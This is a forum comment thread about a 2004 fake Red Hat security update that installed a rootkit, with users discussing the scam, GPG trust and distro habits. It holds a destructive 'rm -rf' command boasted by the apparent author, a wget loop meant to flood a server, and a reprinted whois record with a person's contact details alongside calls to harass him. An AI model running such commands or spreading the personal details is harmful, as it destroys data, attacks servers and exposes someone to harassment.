This would be a good example, I was thinking of something kinda similar, what protocol would be suitable for this? I think the advancement of Firefox would be a step in the right direction as well, if general consumer pc's were setup as more of thin clients, and major software moved to browser based applications through Firefox, you might give users access to a music library, process documents, or whatever via this route. Of course this would be for general audiences that read emails and type papers, workstations would still be a must for graphics or whatever else, but this would be a reasonable way. Maybe the service would cost something like $10 a month, unlimited access to music, movies and some apps, this would be genius and make a killing.

Re: text (Why? Because.)

[Thing+1]

This is an honor virus. Please forward to all your friends, then format your hard drive(s). Thank you.

Site re-borked

[Stephen+Samuel]

Why post the text instead of having the /. crowd flood their server to see what they've put up there?

Well, among other things, the site is now very very down.. First time I looked, it just had a note: "This domain has been temporarily disabled. If you are the owner please contact customer service" (paraphrase from memory). Next time I looked, the domain name wasn't even resolving.
Still isn't.

Slashdotted, borked and broken..... Too bad we couldn't do that more often (to sites like this, I mean).

I would, however, like to see what the trojan tarbal was designed to do.

Jobs

[simontek2]

I really need some of you guys resume's. I should be hiring for linux tech around February.

Re:Jobs

In India or U.S.?

whois fedora-redhat.com

whois fedora-redhat.com

Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533

You need to be smart to install it

[shish]

Being a gentoo user, having a compiler is just something I expect to always be there; but then I remembered that this is a user-oriented distro.

What normal user has a compiler, sshd, and a terminal app installed, and the knowledge of how to use the command prompt, and then doesn't have the sense to avoid obviously bogus security updates?

Re:You need to be smart to install it

[atomic-penguin]

Yes holy gentoo user, I bet you have checked every line of code you have ever compiled. There is no such thing as a non user-oriented distro. You said it yourself, "Being a gentoo user...". Note you didn't say, being a gentoo developer I have checked third party emerges for malicious code. Yeah, it could happen, please step down from the high-horse.

Re:You need to be smart to install it

[shish]

WTF? I said "being a gentoo user, I'm used to having a compiler handy", NOT "being a gentoo user, me > *". The distro and myself have nothing to do with this, other than to point out the need for a compiler.

As to there being no user-oriented distros, I have a feeling you were just disargeeing with me because you were angry at my first comment; But to make things clear, I class distros like so:

User distros: Red Hat, Mandrake, Suse, etc
Dev distros: Gentoo, Slack, LFS, etc

The user distros, aimed at joe average (as is this type of attack), tend not to install gcc by default, and so this attack fails. The dev distros, aimed at those with a clue (not the target of this kind of attack) are the ones likely to have gcc, and hence are vulnerable to it.

Re:You need to be smart to install it

[atomic-penguin]

I was just making two points. One being that being a gentoo user does not give you a significant understanding of how the system works. I know a couple clueless gentoo users. The other is that gentoo's build system could be exploited through 3rd party emerge's. Please correct me if I am wrong. If my points didn't come across clear at first it was through lack of caffeine consumption.

Re:You need to be smart to install it

[shish]

I've found that the average technical distro user tends to know a lot more than a user distro user, but there are always exceptions - I use gentoo because I know what I'm doing*, but the skript kiddies tend to think they know what they're doing because they use gentoo...

* and yes, I know. part of knowing what I'm doing is knowing how time wasting and inefficient compiling from source is; but in my case I've found that the side effects of compiling from source outweight the compile time - I'm not just being a stereotypical gentoo fanboy ;)

But on topic, the fact that I user gentoo has little to do with my point - I was just saying how I expect a compiler as standard (and maybe the exploit author did too, hence the requirement of one), but that a regular user wouldn't; No elitism was intended.

And as far as I know, /all/ linux systems are vulnerable to clueless users downloading & running things they shouldn't...

Re:You need to be smart to install it

[atomic-penguin]

Sorry I was way out of line. I am an asshole. I read your initial post all wrong. Not only did I read it wrong once, but twice. I took offense from the start from the "Being a gentoo user...compiler is pretty much standard." Which sounds a lot like elitist gentoo crap. Like wtf, he actually thinks gentoo is the only system dependent on compilers? I had never read the funroll-loops page, utterly hilarious thanks for posting that. Sorry, and hope you can overlook my hasty arrogance.

Even if you have the code ...

[Gopal.V]

> Running untrusted code can result in system compromise.

Even if you have the CODE !!.

So much for "Open Source" trojans :)

Who was it posted to?

[ozmanjusri]

Is there a pattern of addresses the phish was posted to? There may have been a mailing list of Linux user database compromised.

Seems nobody mentioned the best part..

[eddy]

LinuxWorld linked to the fake alert! You know, LinuxWorld featuring Maureen O'Gara? They've since yanked it, but boy were they fast in linking to it...

Re:Seems nobody mentioned the best part..

[Tony-A]

LinuxWorld linked to the fake alert! ... They've since yanked it, but boy were they fast in linking to it...

Initial reactions can be very telling.
Security updates should always be treated with a bit of suspicion.
Unexpected updates from strange places are almost certainly fakes.

WTF??

[temojen]

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

We're supposed to believe this?

Tinfoil Hat Theory

Well to be a little paranoid, since a recent rootkit was also released for OS X and since Red Hat is the most well known Linux distro and maybe the most widely used, maybe some jealous folks in Redmond created exploits to make it look like their two biggest competitors were "just as vulnerable."

Both looks sloppy and would take a real moron running the system to be exploited, but they are enough to generate headlines that say "Linux and OS X are just as insecure as Windows."

Most of users won’t effect but look out for..

[vivekg]

Yes most of users are good techies and hard core linux user doesn't use RedHat or Fedora at on home system. Now about security, One Gentoo bug deletes entire /usr file system without any such bug so we need to be careful on both front ends I guess

Re: I'll try it... Execution results!

[colinleroy]

Looks like the

AllowUsers

directive of sshd_config can be a useful little bit of paranoia. I could run that at home and it would fail completely.

Re: I'll try it... Execution results!

Yep, it's Romanian all right.

The translation for "Inca un root frate belea: " would be "Another fuckin' root: " whilst "Inca o roata" is "Yet another wheel".

Re:DON'T DO THIS

Morons don't use Linux you fucking cretin.

Re: text (Why? Because.)

[Tony-A]

This is an honor virus. Please forward to all your friends, then ...

They all are.
The difference is in how visible what they are up to is.
Hiding stuff from "dumb" users is a bad idea.

MOD PARENT up

The address is right there.
Go Fuck him

What about Fedora Core 3?

[xbsd]

Excuse me while I put on my tin-foil hat, but I have this weird feeling about it. True, everything seems so sloppy (just think about it, he sent the e-mail to advocacy@openbsd, that's how I got it). However, Fedore Core 3 is about to be released in two weeks or less and lots of FC2 users will be pointing at the Red Hat servers in a few days. I think Red Hat should be quite careful w/this one.

Re: text (Why? Because.)

[Stephen+Samuel]

This is a buggy honor virus. Please format your hard drive(s) and then pass it to all your friends.
Thank you.

Re: I'll try it... Execution results!

[KarmaPolice]

Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

Been there, done that:
<root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
Recipient Rejected: Not accepting mail for this account : Account
terminated due to violation of user agreement

...the system works!

Re: I'll try it... Execution results!

[sslcomm]

Actually, the translation is along the lines of "Another root bro, cool!". The mail subject is somewhat similar ("yet another root") - "roata" means wheel, but it's a common word for root in Romanian IRC/script kiddie lingo. HTH

Not completely clueless

[Stephen+Samuel]

They don't have to fool everyone, just a bunch of select, clueless newbies.

Not completely clueless.. They'd need somebody who knows enough to follow the instructions (and recognize them as vaguely reasonable), but who's just clueless enough to not know that Red Hat would never release a patch in this manner.

I know a few people who would have a problem passing test one (recent converts where I installed their system for them), but most people who could easily pass the first test would also smell the rat.

Re:Not completely clueless

[thegrassyknowl]

I concede on one point - the newbie would have to know enough to become root to install the "patch".

Some know how, some don't.

I remember in my young days (by young, I came in at Red Hat 5). I knew how to become root by the end of the first day, but didn't know anything about this "monster" called RPM. If someone had offered me a "patch" in the form of a TGZ file along with instructions on how to "install" it, I probably would have done it.

It takes a while to learn about RPMs and package signing and things like that, and most newbies learn how to become root LONG before they learn any of those things... Most new Linux users would see that site (fedora-redhat...) as legitimate and follow blindly.

Re:Not completely clueless

[chthon]

Yes, these are the people that always casue trouble, the ones who think that they know about computers and software, but do not have any technical background in both.

I had problems in the past with them, they where always the people who brought viruses on the system.

The only thing that has changed since those days, is that client software from a certain well known monopolist, has it also made possible for completely clueless users to infect systems. At least those were happy enough to do their job using the computer.

Re: I'll try it... Execution results!

http://mixmaster.sourceforge.net/

Re: text (Why? Because.)

[commodoresloat]

The url was in the slashdot story. It doesn't take a brain to copy and paste it if you really wanted to click and go there.

By the way, the site does not resolve at all as of now (1:48 am in Los Angeles). I guess the slashdot story did lead to it getting taken offline one way or another.

Re: I'll try it... Execution results!

[voodookid]

Translation from romanian to englush "Another root account dude !"

Lucky I use Gentoo and not a binary based distro!

[OneNonly]

This patch would still be compiling by the time I got to Slashdot... ;-)

Because I hate redhat. -nt-

[irc.goatse.cx+troll]

MOD PARENT UP

and I don't even watch baseball

Re: Fully Patched? IE6

[Celt]

In fairness I'd imagine most people here are using other browsers besides IE 4/5/6. If your on the net and you load activeX etc without wanting them I have no pitty for you.
Use Opera or FF etc for feck sake!

Re: I'll try it... Execution results!

As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?

So how many people do you expect to actually fall for this trojan, and then mail "bogus" results to them?

We need a stronger Web of Trust

[KjetilK]

Everyone checks the gpg signatures right?

Well, sure, but... Can I trust what I'm seeing?

Often, distros rely on that the keyring has been distributed by trusted means. That the keyring hasn't been compromised. But since for PGP to be useful in checking e-mail and stuff, people generally import lots of keys, so this is not the best thing to rely on.

Anybody can generate a keypair "Red Hat Security " or whatever, and sign their trojan with that. Sure, gpg will report that the "update" is unmodified and signed by security@redhat.com. But since you do not know who security@redhat.com is, you can still be duped.

We should be building a huge social network, a PGP-based web of trust (WOT), so that you can actually check if the guy who signed a package is trusted by you or someone else you trust. People need to generate keypairs, go to keysigning parties, take the opportunity to exchange signatures whenever one is out travelling, etc. Go get yourself registered as willing to sign.

The next problem is to decide who you "ownertrust". To extend your WOT to people you haven't met, you assign a "ownertrust" to people, which says something about to what extent you trust them to correctly verify the identity of others.

I think this is rather hard to do these days. I don't know enough people personally to know their key signing habits, if they keep their private key safe, and stuff like that. Such things are important to know if you are to ownertrust.

I have thought about it a bit, and I think it would be nice if one could declare important aspects of one's policy in such a way people could easily find the policy when going through their keyring, to set ownertrusts.

Say, one could for example use FOAF to say things like "I only sign people I meet face to face after carefully checking their photo IDs and having them respond to an encrypted e-mail" and "I keep my private key on a networked computer that I control", "my passphrase is a mangled 20+ letter string" etc.

gpg --update-trustdb

amd similar tools could display these policies to the user and aid the user in making a more informed decision.

The problem with this approach is of course that people can state a policy they don't follow, but the non-personal WOT is really built on signatures, so I don't think that is a problem.

What do people thing of this idea?

FUCKING MOD PARENT UP

and grandparent. This is some funny shit.

Re:Stupid Tricks? (Gentoo)

I disagree, a lot of people installed Gentoo and BSD and believe the operating systems to be effective tools for computing, while in reality they are resting comfortably in oblivion. Stupid? I think so.

Could this be the same person your after?

They were trying to use cc's on a hosting company earlier this year.

Topic: I need password and learn to hack

posted by Jackson on 2004-01-12 22:58:56
[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)] [203.162.3.147]*

Please send me password of account: haikiengiang2003@yahoo.com
And i want to study how to hack password email,please tell me...hix hix
I'm really to study
Send me the lesson on jacksonddt@yahoo.ca
Thanks very much...,
jackson

Here's a forum they were using at the time.
<URL:http://hanoi.vnn.vn/goctem/kb_td_mb/de tail.as p?ID=2320445782/>

Ah, Romania

Ah, Romania

GPG key checks out...

[morzel]

As others have mentioned, the archive contains an (unaltered) version of a genuine Red Hat RPM so the GPG sig for that file is actually intact.

Of course the icky bits of the rootkit are in the installer, not in the supplied RPM (which isn't used).

Installer Sandbox?

[Midnight+Thunder]

With annoucement of this trojon and the potential Mac trojan it got me wondering whether an 'installer sandbox' would be of use. Basically it would allow the installer to run and then check which files would have been installed or modified. It would then warn of any potential security issues and at that point you can decide whether you wish to run the installer for real.

A simple generic version of the tool would allow you to log all file accesses of a file. This would be like lsof for a process, but instead would monitor the application from launch to exit.

Re: text

[Proteus]

Create a text file called dl-patch.sh (or something) with the following contents:

while [ "a" == "a" ]; do
wget -nd <url-to-patch-file> -O /dev/null
sleep 5
done

Of course, you'll have to replace <url-to-patch-file> with the appropriate URL pointing to the patch script. The -O /dev/null causes wget to write the patch to /dev/null, which effectively means it goes off into no-mans land, and never gets written to disk.

The sleep is a good idea because otherwise the server is likely to automatically block you as a DoS attacker.

Re: I'll try it... Execution results!

[Spoing]

1. So how many people do you expect to actually fall for this trojan, and then mail "bogus" results to them?

Your guess is as good as mine. I'd expect quite a few.

Re: I'll try it... Execution results!

[Spoing]

1. http://mixmaster.sourceforge.net

Quoting from above:

"Mixmaster is the type II remailer protocol and the most popular implementation of it.

Remailers provide protection against traffic analysis and allow sending email anonymously or pseudonymously. Mixmaster consists of both client and server installations and is designed to run on several operation systems including but not limited to *BSD, Linux and Microsoft Windows. "

Interesting...though you still have to send it through a normal mail server at some point. That system will have headers pointing back to the remailer server. Even if the headers are forged, the most recient servers will not be forged unless you use multiple mixmaster (or other) remailers that strip the headers.

Without that strip and resend capability, the bad guys can still get lots of information though I admit won't easily find the original sending machine. I'd check the headers carefully just in case, though!

Interesting that they did'nt use RPM

[kurt555gs]

I like the fact you have to make, make install.

If they sent the trojan in RPM format chances are it would crash with dependancy problems

Cheers

Re:It will be interesting

What a fecking troll.

You can keep touting this false meme all you want but it isn't going to make it magically come true (if it *were* true, then Apache, which arguably *is* in the spotlight, would have more remotely exploitable security breaches than MS's IIS). Why don't you face the fact that MS isn't being treated any worse than they deserve? They even admit themselves that their focus isn't on security (it's on maximizing profit--duh!).

Oops, I forgot! You were trolling! Sorry to interrupt.

You guys are all funny

Writing that code was awesome ... I did not intend to do any harm but to test the stupidity of random persons.

Oh my gosh ... I couldn't even count how many .edu-s and .gov-s came ... so shut the f up and get to realize this was a White Hat deal. Other dude would've get in all boxes and screw`em up.

Certainly not a first trojan...

I remember seeing following message at the ancient times of text terminals and PINE:
"The rearrangements in our servers require all our clients to type right now 'V' 'S' and 'Y' on the terminal. Please follow the ordes carefully."
The message had an attatchment, named .cshrc :)

Re: text (Why? Because.)

[erroneus]

HAhaaha... you're right.

You wrote it didn't you! :)

Fedora-Redhat.com White Hat business

[Fedora-Redhat.com]

From The Author of fileutils-1.0.6.patch.tar.gz :) I wrote that little script only for testing random persons' stupidity. Stop talking shit and commenting on this crap. You accuse me for more than I've done. Also, there were lots and i mean LOTS of .edu and .gov in the inbox ... I did not login in any of those servers so ... It was a cool experience ... worth the time and I also had a copious laugh ... honestly Thanks you guys for all your advices ... I am currently on a 1.0.7 version :)) that you won't even intercept and the purpose will be ssh -l user server --> rm -rf /var /sbin /home /usr ; /bin/reboot -n ... Btw... i hate redhat and fedora ... too many segfaults honestly :) They're good though for rk and script testing ... (knoppix should do) ... The devil f*cks the penguin :)))

Re:Fedora-Redhat.com White Hat business

Suuuuuuuuure. GFY and never come back.

Re:Fedora-Redhat.com White Hat business

[zuesse]

And this is your mind on microsoft...

Any questions?

Addlebrain provides free email service though!

[HydroPhonic]

... so it could be anybody...

The link is down now thank goodness

[davidwr]

Someone slapped them.
Hope someone gets a visit from the FBI over this.

Re: I'll try it... Execution results!

[Tony-A]

...the system works!

Agreed, but it needs be very very careful as to any assumptions as to exactly which system it was that worked.

The first order of business is to somehow, anyhow, stem the tide.
The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superor forces with inferior forces.

Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.

translation of the text messages :)

[tirnacopu]

Well, it seems a Romanian fellow wrote the thingie -
"Inca un root frate belea:" means "Another root bro cool"
"mama" means exactly what it seems
"stii tu" = "you know"
"Inca o roata" = "another wheel"

Re:It will be interesting

(if it *were* true, then Apache, which arguably *is* in the spotlight, would have more remotely exploitable security breaches than MS's IIS)

According to an article Slashdot itself posted, Apache IS the most-breached server. Headline was "Linux Most Attacked OS On Net"--search for it yourself and see.

The truth hurts and all, but it's the truth.

Re: text (Why? Because.)

[Thing+1]

Heh, I was going to add text saying that the honor viruses that made the rounds were actually coded wrong, because they performed the steps backwards (as you did). But then I figured that was too much verbage for a +5 Funny. ;-)

Well commented source-code

[zaphraud]

Good thing they left all those comments in there, makes it much easier to read once decrypted, huh?

Hotlink to image on redhat?!?!?

[zaphraud]

Gee, no wonder RH was on top of this -1 days from the slashdot posting. That means it was right there in their server's REFERER logs from the very instant it first happened! I hate to say this, but in all fairness, I don't think anyone EVER gave Microsoft a heads up like that did they? Now granted, Microsoft is still the company that witholds a responce to a security incident until it makes the 6-o-clock TV news. I'm just saying that this incident doesn't necessarily make RedHat saints...

You need to forget to erase it

[zaphraud]

So that the next day, a coworker wonders why that "safe, unconnected" machine you set up to play with this isn't plugged in, and "fixes" the problem real quick, so that all the network lights on the panel in back match again... Still think this one was intended for disgruntled admins to install; its an obvious fake, but if installed by a disgruntled admin, it only has to look real enough to fool a jury or a boss (just in case).

Re: text (Why? Because.)

[Stephen+Samuel]

Well, now we both got to karma whore, so everybody's happy at this end of the stick.

Re: text (Why? Because.)

[Thing+1]

Absolutely! ;-)

Btw, I like your sig. I've seen you around here, time to make you a friend.

Cheers!

PS Not really whoring since +1 Funny doesn't actually affect karma, according to the docs, but it's still fun to make others laugh.

Re:Most of users won’t effect but look out fo

[zuesse]

Are fat fingers considered a bug?
Can't seem to find that one.